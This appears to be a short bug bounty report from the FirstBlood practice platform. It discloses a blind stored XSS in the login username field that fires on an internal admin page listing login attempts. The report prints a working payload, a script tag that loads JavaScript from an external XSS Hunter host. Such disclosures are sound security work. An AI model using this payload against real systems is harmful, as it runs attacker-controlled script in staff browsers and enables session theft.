FirstBlood-#1571 — Blind XSS on Internal Adminstrator dashboard
This issue was discovered on FirstBlood v3
On 2022-12-11, mr_xhunt Level 8 reported:
Summary:
Since on /login.php
it was mentioned Attempts to login will be logged.
thus
While Spraying the XSS payload randomly, found the blind XSS in the username
parameter on the https://firstblood-helper.com/login_attempts.php
Steps to Reproduce:
- Visit the
/login.php
endpoint
- In the username enter the payload:
"><script src=https://mrxhunt.xss.ht></script>
and hit Login
- Wait for few hrs, when the admin actually visit the page the payload is executed
- Blind XSS executed and POC can be seen on XSSHUNTER: https://firstblood-helper.com/login_attempts.php
P1 CRITICAL
Endpoint: /login_attempts.php
Parameter: username
Payload: "><script src=https://mrxhunt.xss.ht></script>
FirstBlood ID: 72
Vulnerability Type: Stored XSS
Login attempts were logged on an internal panel on firstblood-helper.com and the username is vulnerable to blind XSS affecting FirstBlood staff